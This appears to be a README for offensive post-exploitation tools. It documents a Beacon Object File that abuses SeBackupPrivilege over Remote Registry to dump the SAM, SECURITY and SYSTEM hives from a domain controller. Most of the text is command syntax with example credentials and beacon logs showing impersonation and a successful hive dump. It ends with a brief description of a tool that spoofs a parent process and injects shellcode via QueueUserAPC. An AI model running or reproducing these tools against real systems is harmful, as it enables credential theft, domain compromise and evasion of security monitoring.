A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.
Inspired by https://twitter.com/filip_dragovic initial PoC. Just made it into a BOF.
Could be improved to auto download the hives. CBA
BackupPrivSAM [\\computername] [save path] (optional: [domain] [username] [password])
-
Dump the Hives to remote C:\ drive, using the current Primary Token
BackupPrivSAM \\dc01.contoso.local C:\ -
Dump the Hives to remote C:\ drive, and impersonate a user
BackupPrivSAM \\dc01.contoso.local C:\ CONTOSO backup_service Password123
beacon> backupPrivSAM \\cdc001.corp.contoso.local C:\ CORP backup_service *************
[*] Launching backupPrivSAM...
[+] host called home, sent: 2589 bytes
[+] received output:
Got Credentials. Making Token...
[+] received output:
Impersonated user: CORP\backup_service
[+] received output:
Will try to dump SAM from \\cdc001.corp.contoso.local\HKLM\ into folder 'C:\'
[+] received output:
Connecting to remote registry of '\\cdc001.corp.contoso.local'
[+] received output:
RegConnectRegistryW() - OK
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SAM hive to C:\SAM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SYSTEM hive to C:\SYSTEM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SECURITY hive to C:\SECURITY
beacon> ls \\cdc001\C$
[*] Tasked beacon to list files in \\cdc001\C$
[+] host called home, sent: 29 bytes
[*] Listing: \\cdc001\C$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 04/29/2019 01:27:26 $Recycle.Bin
dir 04/27/2019 16:32:36 Documents and Settings
dir 05/05/2019 17:53:11 PerfLogs
dir 11/20/2019 11:30:27 Program Files
dir 04/28/2019 17:45:56 Program Files (x86)
dir 08/17/2021 21:09:38 ProgramData
dir 04/27/2019 16:32:36 Recovery
dir 04/28/2019 17:46:10 System Volume Information
dir 04/29/2019 01:26:56 Users
dir 10/02/2021 19:27:55 Windows
380kb fil 11/21/2016 00:42:45 bootmgr
1b fil 07/16/2016 14:18:08 BOOTNXT
1gb fil 07/19/2022 17:45:55 pagefile.sys
52kb fil 07/23/2022 21:23:45 SAM
32kb fil 07/23/2022 21:23:45 SECURITY
17mb fil 07/23/2022 21:23:45 SYSTEM
beacon> make_token CORP\backup_service **********
[*] Tasked beacon to create a token for CORP\backup_service
[+] host called home, sent: 59 bytes
[+] Impersonated CORP\Administrator
beacon> backupPrivSAM \\cdc001.corp.contoso.local C:\
[*] Launching backupPrivSAM...
[+] host called home, sent: 2511 bytes
[+] received output:
Will try to dump SAM from \\cdc001.corp.contoso.local\HKLM\ into folder 'C:\'
[+] received output:
Connecting to remote registry of '\\cdc001.corp.contoso.local'
[+] received output:
RegConnectRegistryW() - OK
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SAM hive to C:\SAM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SYSTEM hive to C:\SYSTEM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SECURITY hive to C:\SECURITY
beacon> ls \\cdc001\C$
[*] Tasked beacon to list files in \\cdc001\C$
[+] host called home, sent: 29 bytes
[*] Listing: \\cdc001\C$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 04/29/2019 01:27:26 $Recycle.Bin
dir 04/27/2019 16:32:36 Documents and Settings
dir 05/05/2019 17:53:11 PerfLogs
dir 11/20/2019 11:30:27 Program Files
dir 04/28/2019 17:45:56 Program Files (x86)
dir 08/17/2021 21:09:38 ProgramData
dir 04/27/2019 16:32:36 Recovery
dir 04/28/2019 17:46:10 System Volume Information
dir 04/29/2019 01:26:56 Users
dir 10/02/2021 19:27:55 Windows
380kb fil 11/21/2016 00:42:45 bootmgr
1b fil 07/16/2016 14:18:08 BOOTNXT
1gb fil 07/19/2022 17:45:55 pagefile.sys
52kb fil 07/23/2022 21:24:06 SAM
32kb fil 07/23/2022 21:24:07 SECURITY
17mb fil 07/23/2022 21:24:07 SYSTEM
queueuserapc_ppid/
BOF spawns a process of your choice under a specified parent, and injects a provided shellcode file via QueueUserAPC().
